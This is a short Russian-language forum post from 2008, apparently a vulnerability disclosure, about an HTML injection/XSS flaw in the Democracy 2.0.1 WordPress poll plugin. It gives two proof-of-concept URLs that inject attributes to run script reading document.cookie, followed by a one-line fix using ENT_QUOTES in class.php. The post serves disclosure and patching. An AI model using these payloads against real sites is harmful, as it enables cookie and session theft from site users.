17.01.2008, 17:23
|
|
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379
Репутация:
3812
|
|
Democracy 2.0.1 HTML Injection Vulnerability
Код:
http://wordpress.dom/blah’style=xss:expression(alert(document.cookie)); (Tested on IE7)
OR
http://wordpress.dom/blah’onMouseOver=javascript:alert(document.cookie);// (Testing on Firebox & IE)
fix
PHP код:
Vulnerable code: in class.php (Line 166)
$url = htmlspecialchars(add_query_arg(array(’dem_action’ => ‘view’, ‘dem_poll_id’ => $this->id)));
Change to:
$url = htmlspecialchars(add_query_arg(array(’dem_action’ => ‘view’, ‘dem_poll_id’ => $this->id)), ENT_QUOTES);
__________________
|
|
|